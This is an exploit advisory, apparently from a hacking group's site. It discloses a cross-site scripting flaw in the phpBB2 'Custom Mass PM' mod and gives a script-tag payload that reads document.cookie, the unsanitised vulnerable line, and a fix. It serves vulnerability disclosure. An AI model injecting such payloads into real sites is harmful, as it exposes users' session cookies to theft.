-------------------------------------------------------------------------------
0                             | |              | |                      | |  TM
1   _______  _ __   ___ ______| |__   __ _  ___| | _____ _ __ _ __   ___| |_
0  |_  / _ \| '_ \ / _ \______| '_ \ / _` |/ __| |/ / _ \ '__| '_ \ / _ \ __|
1   / / (_) | | | |  __/      | | | | (_| | (__|   <  __/ | _| | | |  __/ |_
0  /___\___/|_| |_|\___|      |_| |_|\__,_|\___|_|\_\___|_|(_)_| |_|\___|\__|
1                         0xPrivate 0xSecurity 0xTeam
0       ++++++++++++++++++++++++++++++++++++++++++++++++++++
1                      A Placec Of 0days  
------------------------------------------------------------------------------

^ Exploit title: PhpBB2 Module "Custom Mass PM" Cross Site Scripting Vulnerability
^ Author     : Silic0n (science_media017[At]yahoo.com)
^ MOD Title: Custom mass PM 
^ MOD Description: Add mass PM functionnality to group members (or all forums members) for   authorized users. Add the   possibility for all users to send ordinary PM to multiple users   (usernames separated by a semi-colon)
^ MOD Version: 1.4.7 
^ Exploit Release: 8/27/2011
^ Vulnearble script: privmsg.php


--------------------
^ Payload
--------------------
0x1 : Goto forum_script/Privmsg.php
0x2 : Username Input Box write Malicious JS eg :<script>alert(document.cookie)</script>

--------------------
^ Vulnearble code 
--------------------

$to_username_array = explode (";", $HTTP_POST_VARS['username']);

--------------------
Fix :
--------------------

$to_username = phpbb_clean_username($HTTP_POST_VARS['username']);
$to_username_array = explode (";", $to_username);



Special Thnanks To mafi, Gaurav_raj420 ,  Exidous , Mr 52 (7) , Dalsim , Zetra , root4o ,
 D4rk, Danzel, messsy , Thor ,abronsius ,Nova , jaya ,@ry@n ,entr0py, -[SiLeNtp0is0n]-
,Ne0_Hacker, InX_R00t,DODo(:P)  All ZH , DK & G4H members :)
 
------------
^ Site 
------------
www.igniteds.net (ConsoleFx)